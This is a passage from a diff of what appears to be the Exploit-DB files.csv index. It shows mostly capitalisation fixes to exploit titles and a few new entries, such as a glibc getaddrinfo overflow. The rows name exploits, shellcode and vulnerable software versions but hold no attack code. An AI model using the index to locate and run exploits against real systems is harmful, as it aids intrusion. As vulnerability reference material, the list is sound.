Scripting",2009-08-31,Inj3ct0r,php,webapps,0 34446,platforms/php/webapps/34446.txt,"LiveStreet 0.2 - include/ajax/blogInfo.php asd Parameter Cross-Site Scripting",2009-08-31,Inj3ct0r,php,webapps,0 34447,platforms/php/webapps/34447.py,"Plogger 1.0-RC1 - Authenticated Arbitrary File Upload",2014-08-28,b0z,php,webapps,80 -34448,platforms/multiple/remote/34448.rb,"Firefox - WebIDL Privileged Javascript Injection",2014-08-28,Metasploit,multiple,remote,0 +34448,platforms/multiple/remote/34448.rb,"Firefox - WebIDL Privileged JavaScript Injection",2014-08-28,Metasploit,multiple,remote,0 34449,platforms/multiple/webapps/34449.txt,"ManageEngine DeviceExpert 5.9 - User Credential Disclosure",2014-08-28,"Pedro Ribeiro",multiple,webapps,0 34450,platforms/php/webapps/34450.py,"ActualAnalyzer Lite 2.81 - Unauthenticated Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 34451,platforms/php/webapps/34451.py,"PhpWiki - Remote Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 @@ -31064,6 +31065,7 @@ id,file,description,date,author,platform,type,port 34479,platforms/php/webapps/34479.html,"CMSimple 3.3 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-16,"High-Tech Bridge SA",php,webapps,0 34480,platforms/windows/dos/34480.py,"Xilisoft Video Converter 3.1.8.0720b - '.ogg' Buffer Overflow",2010-08-16,"Praveen Darshanam",windows,dos,0 34481,platforms/php/webapps/34481.txt,"123 Flash Chat - Multiple Security Vulnerabilities",2010-08-16,Lincoln,php,webapps,0 +40339,platforms/linux/remote/40339.py,"glibc - getaddrinfo Stack Based Buffer Overflow",2016-09-06,SpeeDr00t,linux,remote,0 34482,platforms/php/webapps/34482.txt,"TurnkeyForms Yahoo Answers Clone - 'questiondetail.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34483,platforms/php/webapps/34483.txt,"Nasim Guest Book - 'page' Parameter Cross-Site Scripting",2010-08-10,Moudi,php,webapps,0 34484,platforms/php/webapps/34484.txt,"Joomla! 'com_dirfrm' Component - Multiple SQL Injections",2010-08-18,Hieuneo,php,webapps,0 @@ -31081,24 +31083,24 @@ id,file,description,date,author,platform,type,port 34502,platforms/windows/dos/34502.py,"Serveez 0.1.7 - 'If-Modified-Since' Header Stack Buffer Overflow",2009-08-09,"lvac lvac",windows,dos,0 34503,platforms/php/webapps/34503.txt,"Syntax Highlighter 3.0.83 - 'index.html' HTML Injection",2010-08-19,indoushka,php,webapps,0 34504,platforms/php/webapps/34504.txt,"Cacti 0.8.7 (Red Hat High Performance Computing - HPC) - utilities.php filter Parameter Cross-Site Scripting",2010-08-19,"Marc Schoenefeld",php,webapps,0 -34505,platforms/php/dos/34505.txt,"MySQL 5.1.48 - 'TEMPORARY InnoDB' Tables Denial Of Service",2010-08-19,"Boris Reisig",php,dos,0 +34505,platforms/php/dos/34505.txt,"MySQL 5.1.48 - 'Temporary InnoDB' Tables Denial Of Service",2010-08-19,"Boris Reisig",php,dos,0 34506,platforms/linux/dos/34506.txt,"MySQL 5.1.48 - 'EXPLAIN' Denial Of Service",2010-08-20,"Bjorn Munch",linux,dos,0 34507,platforms/linux/remote/34507.txt,"Nagios XI - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote,0 34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 - 'register/next' SQL Injection",2010-08-23,Sweet,php,webapps,0 34510,platforms/linux/dos/34510.txt,"OraclMySQL 5.1.48 - 'LOAD DATA INFILE' Denial Of Service",2010-08-20,"Elena Stepanova",linux,dos,0 -34511,platforms/php/webapps/34511.txt,"Mulitple Wordpress Themes - 'admin-ajax.php img parameter' Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 +34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes - 'admin-ajax.php img Parameter' Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling SEH Buffer Overflow",2014-09-01,k3170makan,windows,local,0 34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Persistent Cross-Site Scripting",2014-09-01,"Prakhar Prasad",multiple,webapps,0 -34514,platforms/php/webapps/34514.txt,"Wordpress Slideshow Gallery Plugin 1.4.6 - Arbitrary File Upload",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 +34514,platforms/php/webapps/34514.txt,"WordPress Slideshow Gallery Plugin 1.4.6 - Arbitrary File Upload",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 34517,platforms/windows/remote/34517.rb,"Wing FTP Server - Authenticated Command Execution",2014-09-01,Metasploit,windows,remote,5466 34518,platforms/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",jsp,webapps,0 34519,platforms/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400 35592,platforms/windows/dos/35592.py,"jetAudio 8.1.3 Basic (mp3) - Crash (PoC)",2014-12-23,"Drozdova Liudmila",windows,dos,0 -34520,platforms/linux/dos/34520.txt,"Oracle MySQL 5.1.48 - 'HANDLER' interface Denial Of Service",2010-08-20,"Matthias Leich",linux,dos,0 +34520,platforms/linux/dos/34520.txt,"Oracle MySQL 5.1.48 - 'HANDLER' Interface Denial Of Service",2010-08-20,"Matthias Leich",linux,dos,0 34521,platforms/linux/dos/34521.txt,"Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial Of Service",2010-08-20,"Shane Bester",linux,dos,0 34522,platforms/linux/dos/34522.txt,"Oracle MySQL < 5.1.49 - 'DDL' Statements Denial Of Service",2010-07-09,"Elena Stepanova",linux,dos,0 34523,platforms/multiple/remote/34523.txt,"Nagios XI - 'users.php' SQL Injection",2010-08-24,"Adam Baldwin",multiple,remote,0 -34524,platforms/php/webapps/34524.txt,"Wordpress Huge-IT Image Gallery 1.0.1 Plugin - Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80 +34524,platforms/php/webapps/34524.txt,"WordPress Huge-IT Image Gallery 1.0.1 Plugin - Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80 34525,platforms/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python Exploit)",2014-09-02,"Dolev Farhi",multiple,webapps,0 34637,platforms/php/webapps/34637.txt,"Joomla Spider Form Maker 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",php,webapps,0 34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Execution",2010-08-25,storm,windows,remote,0 @@ -31110,12 +31112,12 @@ id,file,description,date,author,platform,type,port 34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 - Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 34536,platforms/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 34537,platforms/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses",2010-08-26,"Micha Riser",linux,local,0 -34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager - Unauthenticated Configuration Access",2014-09-05,Hannaichi,php,webapps,80 +34538,platforms/php/webapps/34538.txt,"WordPress Plugins Premium Gallery Manager - Unauthenticated Configuration Access",2014-09-05,Hannaichi,php,webapps,80 34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Persistent Cross-Site Scripting",2014-09-05,"Fikri Fadzil",php,webapps,80 34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit (Python)",2014-09-05,"Robert Kugler",windows,dos,0 34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus - Name and Body Fields HTML Injection Vulnerabilities",2010-08-29,MiND,php,webapps,0 34542,platforms/windows/remote/34542.c,"UltraVNC 1.0.8.2 - DLL Loading Arbitrary Code Execution",2010-08-30,"Ivan Markovic",windows,remote,0 -34543,platforms/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 - parameters.php device Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 +34543,platforms/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 - Parameters.php device Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 34544,platforms/php/webapps/34544.txt,"HP Insight Diagnostics Online Edition 8.4 - idstatusframe.php Multiple Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 34545,platforms/php/webapps/34545.txt,"HP Insight Diagnostics Online Edition 8.4 - survey.php category Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 34546,platforms/php/webapps/34546.txt,"HP Insight Diagnostics Online Edition 8.4 - globals.php tabpage Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 @@ -31125,9 +31127,9 @@ id,file,description,date,author,platform,type,port 34550,platforms/php/webapps/34550.txt,"Datemill - search.php st Parameter Cross-Site Scripting",2009-09-10,Moudi,php,webapps,0 34551,platforms/php/webapps/34551.txt,"IP Board 3.x - Cross-Site Request Forgery Token hjiacking",2014-09-07,"Piotr S.",php,webapps,0 34552,platforms/php/webapps/34552.txt,"LoadedCommerce7 - Systemic Query Factory",2014-09-07,Breaking.Technology,php,webapps,0 -34553,platforms/php/webapps/34553.txt,"Wordpress Like Dislike Counter 1.2.3 Plugin - SQL Injection",2014-09-07,Att4ck3r.ir,php,webapps,0 +34553,platforms/php/webapps/34553.txt,"WordPress Like Dislike Counter 1.2.3 Plugin - SQL Injection",2014-09-07,Att4ck3r.ir,php,webapps,0 34555,platforms/php/webapps/34555.txt,"PhpOnlineChat 3.0 - Cross-Site Scripting",2014-09-07,"N0 Feel",php,webapps,0 -34604,platforms/php/webapps/34604.php,"BlueCMS 1.6 - 'X-Forwarded-For' Header SQL Injection",2010-09-06,cnryan,php,webapps,0 +34604,platforms/php/webapps/34604.php,"BlueCMS 1.6 - 'x-forwarded-for' Header SQL Injection",2010-09-06,cnryan,php,webapps,0 34558,platforms/php/webapps/34558.txt,"Amiro.CMS 5.8.4.0 - Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 34559,platforms/php/webapps/34559.txt,"Rumba XML 2.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 34560,platforms/php/webapps/34560.html,"ArtGK CMS - Cross-Site Scripting / HTML Injection",2010-09-01,"High-Tech Bridge SA",php,webapps,0 @@ -31136,21 +31138,21 @@ id,file,description,date,author,platform,type,port 34563,platforms/php/webapps/34563.txt,"OneCMS 2.6.1 - 'index.php' Cross-Site Scripting",2010-09-02,anT!-Tr0J4n,php,webapps,0 34564,platforms/php/webapps/34564.txt,"CMS WebManager-Pro - 'c.php' SQL Injection",2010-09-02,MustLive,php,webapps,0 34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 - 'nusoap.php' Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps,0 -34578,platforms/php/webapps/34578.txt,"Wordpress Acento Theme - 'view-pdf.php file parameter' Arbitrary File Download",2014-09-08,alieye,php,webapps,80 +34578,platforms/php/webapps/34578.txt,"WordPress Acento Theme - 'view-pdf.php file Parameter' Arbitrary File Download",2014-09-08,alieye,php,webapps,80 34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0 -34572,platforms/php/webapps/34572.txt,"Wordpress Bulk Delete Users by Email Plugin 1.0 - Cross-Site Request Forgery",2014-09-08,"Fikri Fadzil",php,webapps,0 -34580,platforms/php/webapps/34580.txt,"phpMyFAQ 2.8.X - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 -34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.X - Persistent Cross-Site Scripting",2014-09-08,smash,php,webapps,80 +34572,platforms/php/webapps/34572.txt,"WordPress Bulk Delete Users by Email Plugin 1.0 - Cross-Site Request Forgery",2014-09-08,"Fikri Fadzil",php,webapps,0 +34580,platforms/php/webapps/34580.txt,"phpMyFAQ 2.8.x - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 +34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.x - Persistent Cross-Site Scripting",2014-09-08,smash,php,webapps,80 34924,platforms/windows/webapps/34924.txt,"BMC Track-It! - Multiple Vulnerabilities",2014-10-09,"Pedro Ribeiro",windows,webapps,0 -34582,platforms/php/webapps/34582.txt,"osCommerce 2.3.4 - Multiple vulnerabilities",2014-09-08,smash,php,webapps,80 +34582,platforms/php/webapps/34582.txt,"osCommerce 2.3.4 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 34583,platforms/hardware/webapps/34583.txt,"TP-Link Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80 34584,platforms/hardware/webapps/34584.txt,"TP-Link Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80 34585,platforms/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,443 34586,platforms/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",php,webapps,80 34587,platforms/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,multiple,webapps,8090 34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilities",2014-09-09,jsass,aix,dos,0 -34589,platforms/php/webapps/34589.txt,"Wordpress WP Support Plus Responsive Ticket System 2.0 Plugin - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",php,webapps,0 +34589,platforms/php/webapps/34589.txt,"WordPress WP Support Plus Responsive Ticket System 2.0 Plugin - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",php,webapps,0 34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - Obfuscated Shellcode chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User _ALI_ & Execute /bin/bash (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0 34593,platforms/php/webapps/34593.txt,"Parallels Plesk Sitebuilder 9.5 - Multiple Vulnerabilities",2014-09-09,alieye,php,webapps,0 34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 - Remote Root Code Execution",2014-09-09,eF,linux,remote,80 @@ -31170,7 +31172,7 @@ id,file,description,date,author,platform,type,port 34610,platforms/php/webapps/34610.txt,"ZenPhoto 1.3 - zp-core/full-image.php a Parameter SQL Injection",2010-09-07,"Bogdan Calin",php,webapps,0 34611,platforms/php/webapps/34611.txt,"ZenPhoto 1.3 - zp-core/admin.php Multiple Parameter Cross-Site Scripting",2010-09-07,"Bogdan Calin",php,webapps,0 34805,platforms/php/webapps/34805.txt,"StatsCode - Multiple Cross-Site Scripting Vulnerabilities",2009-07-09,"599eme Man",php,webapps,0 -34806,platforms/php/webapps/34806.txt,"JNM GuestBook 3.0 - 'index.php' Cross-Site Scripting",2009-07-09,Moudi,php,webapps,0 +34806,platforms/php/webapps/34806.txt,"JNM Guestbook 3.0 - 'index.php' Cross-Site Scripting",2009-07-09,Moudi,php,webapps,0 34807,platforms/php/webapps/34807.txt,"JNM Solutions DB Top Sites 1.0 - 'vote.php' Cross-Site Scripting",2009-07-08,Moudi,php,webapps,0 34808,platforms/php/webapps/34808.txt,"Rapidsendit Clone Script - 'admin.php' Insecure Cookie Authentication Bypass",2009-07-08,NoGe,php,webapps,0 34614,platforms/asp/webapps/34614.txt,"SmarterTools SmarterStats 5.3.3819 - 'frmHelp.aspx' Cross-Site Scripting",2010-09-09,"David Hoyt",asp,webapps,0 @@ -31184,7 +31186,7 @@ id,file,description,date,author,platform,type,port 34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 - Directory Traversal",2010-09-15,"Bogdan Calin",windows,remote,0 34751,platforms/hardware/webapps/34751.pl,"ZYXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80 34624,platforms/php/webapps/34624.txt,"OroCRM - Persistent Cross-Site Scripting",2014-09-11,Provensec,php,webapps,80 -34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 - (index.php contacts_id parameter)SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 +34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 - (index.php contacts_id Parameter)SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion",2014-09-11,Vulnerability-Lab,ios,webapps,9900 34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent Cross-Site Scripting",2014-09-11,Vulnerability-Lab,ios,webapps,0 34628,platforms/php/webapps/34628.txt,"Santafox 2.0.2 - 'search' Parameter Cross-Site Scripting",2010-09-06,"High-Tech Bridge SA",php,webapps,0 @@ -31192,7 +31194,7 @@ id,file,description,date,author,platform,type,port 34630,platforms/php/webapps/34630.txt,"AChecker 1.0 - 'URI' Parameter Cross-Site Scripting",2010-09-15,"High-Tech Bridge SA",php,webapps,0 34631,platforms/php/webapps/34631.txt,"ATutor 1.0 - Multiple 'cid' Parameter Cross-Site Scripting Vulnerabilities",2010-09-15,"High-Tech Bridge SA",php,webapps,0 34632,platforms/php/webapps/34632.txt,"Multi Website 1.5 - 'search' Parameter HTML Injection",2009-08-06,"599eme Man",php,webapps,0 -34633,platforms/php/webapps/34633.txt,"Spiceworks - 'query' Parameter Cross-Site Scripting",2009-08-08,"Adam Baldwin",php,webapps,0 +34633,platforms/php/webapps/34633.txt,"SpiceWorks - 'query' Parameter Cross-Site Scripting",2009-08-08,"Adam Baldwin",php,webapps,0 34634,platforms/php/webapps/34634.txt,"Multple I-Escorts Products - 'escorts_search.php' Cross-Site Scripting",2010-09-15,"599eme Man",php,webapps,0 34635,platforms/php/webapps/34635.txt,"Willscript Auction Website Script - 'category.php' SQL Injection",2009-08-06,"599eme Man",php,webapps,0 34636,platforms/php/webapps/34636.txt,"NWS-Classifieds - 'cmd' Parameter Local File Inclusion",2010-09-15,"John Leitch",php,webapps,0 @@ -31237,7 +31239,7 @@ id,file,description,date,author,platform,type,port 34678,platforms/php/webapps/34678.txt,"WebStatCaffe - stat/pageviewerschart.php date Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 34679,platforms/php/webapps/34679.txt,"WebStatCaffe - stat/referer.php date Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 34680,platforms/hardware/webapps/34680.txt,"ZTE ZXDSL-931VII - Unauthenticated Configuration Dump",2014-09-16,"L0ukanik0-s S0kniaku0l",hardware,webapps,0 -34681,platforms/php/webapps/34681.txt,"Wordpress Slideshow Gallery 1.4.6 Plugin - Arbitrary File Upload (Python)",2014-09-16,"Claudio Viviani",php,webapps,0 +34681,platforms/php/webapps/34681.txt,"WordPress Slideshow Gallery 1.4.6 Plugin - Arbitrary File Upload (Python)",2014-09-16,"Claudio Viviani",php,webapps,0 34682,platforms/ios/webapps/34682.txt,"USB&WiFi Flash Drive 1.3 iOS - Code Execution",2014-09-16,Vulnerability-Lab,ios,webapps,8080 34685,platforms/windows/remote/34685.py,"Basic Web Server 1.0 - Directory Traversal / Denial of Service",2010-09-19,"John Leitch",windows,remote,0 34686,platforms/windows/remote/34686.txt,"YelloSoft Pinky 1.0 - Directory Traversal",2010-09-16,"John Leitch",windows,remote,0 @@ -31246,9 +31248,9 @@ id,file,description,date,author,platform,type,port 34689,platforms/php/webapps/34689.txt,"Smart Magician Blog 1.0 - Multiple SQL Injections",2009-08-27,Evil-Cod3r,php,webapps,0 34690,platforms/php/webapps/34690.txt,"@Mail 6.1.9 - 'MailType' Parameter Cross-Site Scripting",2010-09-21,"Vicente Aguilera Diaz",php,webapps,0 34691,platforms/multiple/remote/34691.txt,"CollabNet Subversion Edge Log Parser - HTML Injection",2010-09-21,"Sumit Kumar Soni",multiple,remote,0 -34692,platforms/php/webapps/34692.txt,"WebAsyst Shop-Script PREMIUM - 'searchstring' Parameter Cross-Site Scripting",2009-07-27,u.f.,php,webapps,0 +34692,platforms/php/webapps/34692.txt,"WebAsyst Shop-Script PREMIUM - 'SearchString' Parameter Cross-Site Scripting",2009-07-27,u.f.,php,webapps,0 34693,platforms/php/webapps/34693.txt,"Free Arcade Script 1.0 - 'search' Field Cross-Site Scripting",2009-08-27,"599eme Man",php,webapps,0 -34694,platforms/php/webapps/34694.txt,"ClipBucket 1.7.1 - Multiple SQL Injections",2009-07-24,Qabandi,php,webapps,0 +34694,platforms/php/webapps/34694.txt,"Clipbucket 1.7.1 - Multiple SQL Injections",2009-07-24,Qabandi,php,webapps,0 34695,platforms/windows/remote/34695.c,"GreenBrowser - 'RSRC32.dll' DLL Loading Arbitrary Code Execution",2010-09-22,anT!-Tr0J4n,windows,remote,0 34696,platforms/windows/remote/34696.c,"Easy Office Recovery - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-09-22,anT!-Tr0J4n,windows,remote,0 34697,platforms/windows/remote/34697.c,"Sothink SWF Decompiler - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-09-22,anT!-Tr0J4n,windows,remote,0 @@ -31266,16 +31268,16 @@ id,file,description,date,author,platform,type,port 34709,platforms/php/webapps/34709.txt,"Astrology - 'celebrities.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34710,platforms/php/webapps/34710.txt,"Paypal Shopping Cart Script - 'index.php' Multiple Parameter Cross-Site Scripting",2009-08-21,"599eme Man",php,webapps,0 34711,platforms/php/webapps/34711.txt,"Paypal Shopping Cart Script - 'index.php' cid Parameter SQL Injection",2009-08-21,"599eme Man",php,webapps,0 -34712,platforms/php/webapps/34712.txt,"FreeWebScriptz HUBScript - 'single_winner1.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 +34712,platforms/php/webapps/34712.txt,"Freewebscriptz HUBScript - 'single_winner1.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34713,platforms/php/webapps/34713.txt,"Freelancers - placebid.php id Parameter Cross-Site Scripting",2009-08-17,Moudi,php,webapps,0 34714,platforms/php/webapps/34714.txt,"Freelancers - post_resume.php jobid Parameter Cross-Site Scripting",2009-08-17,Moudi,php,webapps,0 34715,platforms/php/webapps/34715.txt,"AdQuick - 'account.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34803,platforms/php/webapps/34803.txt,"Online GuestBook Pro 5.1 - 'ogp_show.php' Cross-Site Scripting",2009-07-09,Moudi,php,webapps,0 +34803,platforms/php/webapps/34803.txt,"Online Guestbook Pro 5.1 - 'ogp_show.php' Cross-Site Scripting",2009-07-09,Moudi,php,webapps,0 34804,platforms/php/webapps/34804.txt,"Rentventory - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-07-07,"599eme Man",php,webapps,0 34717,platforms/php/webapps/34717.txt,"vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection",2014-09-20,Dave,php,webapps,0 34718,platforms/php/webapps/34718.txt,"M/Monit 3.3.2 - Cross-Site Request Forgery",2014-09-20,"Dolev Farhi",php,webapps,0 -34821,platforms/windows/remote/34821.txt,"InstallShield 2009 15.0.0.53 Premier - 'ISWiAutomation15.dll' ActiveX Arbitrary File Overwrite",2009-09-15,the_Edit0r,windows,remote,0 -34822,platforms/windows/local/34822.c,"Microsoft Windows - Local Procedure Call (LPC) Privilege Escalation",2010-09-07,yuange,windows,local,0 +34821,platforms/windows/remote/34821.txt,"Installshield 2009 15.0.0.53 Premier - 'ISWiAutomation15.dll' ActiveX Arbitrary File Overwrite",2009-09-15,the_Edit0r,windows,remote,0 +34822,platforms/windows/local/34822.c,"Microsoft Windows - Local procedure Call (LPC) Privilege Escalation",2010-09-07,yuange,windows,local,0 34823,platforms/windows/remote/34823.c,"Dupehunter Professional 9.0.0.3911 - 'Fwpuclnt.dll' DLL Loading Arbitrary Code Execution",2010-10-08,anT!-Tr0J4n,windows,remote,0 34824,platforms/php/webapps/34824.txt,"Lantern CMS - '11-login.asp' Cross-Site Scripting",2010-10-08,"High-Tech Bridge SA",php,webapps,0 34825,platforms/php/webapps/34825.html,"Curverider Elgg 1.0 - Templates HTML Injection",2009-06-22,lorddemon,php,webapps,0 @@ -31302,20 +31304,21 @@ id,file,description,date,author,platform,type,port 34745,platforms/php/webapps/34745.txt,"YourFreeWorld Ultra Classifieds - subclass.php cname Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34746,platforms/php/webapps/34746.txt,"Web TV - 'chn' Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34747,platforms/php/webapps/34747.txt,"LittleSite 0.1 - 'file' Parameter Local File Inclusion",2014-09-23,Eolas_Gadai,php,webapps,0 +40338,platforms/php/webapps/40338.txt,"PHPIPAM 1.2.1 - Multiple Vulnerabilities",2016-09-06,"Saeed reza Zamanian",php,webapps,80 34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script - 'addlink.php' SQL Injection",2009-07-21,Moudi,php,webapps,0 34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 - 'admin_index.php' Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0 34752,platforms/windows/dos/34752.c,"WS10 Data Server - SCADA Exploit Overflow (PoC)",2014-09-24,"Pedro Sánchez",windows,dos,0 34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret - Database Disclosure Exploit",2014-09-24,ZoRLu,asp,webapps,80 -34754,platforms/php/webapps/34754.py,"Joomla Face Gallery 1.0 - Multiple vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80 +34754,platforms/php/webapps/34754.py,"Joomla Face Gallery 1.0 - Multiple Vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80 34755,platforms/php/webapps/34755.py,"Joomla Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80 34756,platforms/windows/remote/34756.rb,"EMC AlphaStor Device Manager Opcode 0x75 - Command Injection",2014-09-24,Metasploit,windows,remote,3000 -34757,platforms/windows/remote/34757.rb,"Advantech WebAccess - dvs.ocx GetColor Buffer Overflow",2014-09-24,Metasploit,windows,remote,0 -34758,platforms/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Path Traversal Local File Inclusion",2014-09-24,Securify,php,webapps,80 +34757,platforms/windows/remote/34757.rb,"Advantech Webaccess - dvs.ocx GetColor Buffer Overflow",2014-09-24,Metasploit,windows,remote,0 +34758,platforms/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion",2014-09-24,Securify,php,webapps,80 34759,platforms/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,php,webapps,80 34760,platforms/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting",2014-09-24,"Kenneth F. Belva",php,webapps,80 -34761,platforms/php/webapps/34761.txt,"webEdition 6.3.8.0 (SVN-Revision: 6985) - Path Traversal",2014-09-24,"High-Tech Bridge SA",php,webapps,80 -34762,platforms/php/webapps/34762.txt,"Wordpress Login Widget With Shortcode 3.1.1 Plugin - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80 -34763,platforms/php/webapps/34763.txt,"OsClass 3.4.1 - (index.php file parameter) Local File Inclusion",2014-09-25,Netsparker,php,webapps,80 +34761,platforms/php/webapps/34761.txt,"webEdition 6.3.8.0 (SVN-Revision: 6985) - Directory Traversal",2014-09-24,"High-Tech Bridge SA",php,webapps,80 +34762,platforms/php/webapps/34762.txt,"WordPress Login Widget With ShortCode 3.1.1 Plugin - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80 +34763,platforms/php/webapps/34763.txt,"OSClass 3.4.1 - (index.php file Parameter) Local File Inclusion",2014-09-25,Netsparker,php,webapps,80 34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80 34765,platforms/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (Shellshock)",2014-09-25,"Stephane Chazelas",linux,remote,0 34766,platforms/linux/remote/34766.php,"Bash - Environment Variables Code Injection (Shellshock)",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80 @@ -31326,9 +31329,9 @@ id,file,description,date,author,platform,type,port 34771,platforms/php/webapps/34771.txt,"PHP Scripts Now Hangman - 'index.php' letters Parameter Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0 34772,platforms/php/webapps/34772.txt,"Honest Traffic - 'msg' Parameter Cross-Site Scripting",2009-07-17,Moudi,php,webapps,0 34773,platforms/php/webapps/34773.txt,"Horde IMP Webmail 4.3.7 - 'fetchmailprefs.php' HTML Injection",2010-09-27,"Moritz Naumann",php,webapps,0 -34774,platforms/php/webapps/34774.txt,"Hotscripts Type PHP Clone Script - feedback.php msg Parameter Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 -34775,platforms/php/webapps/34775.txt,"Hotscripts Type PHP 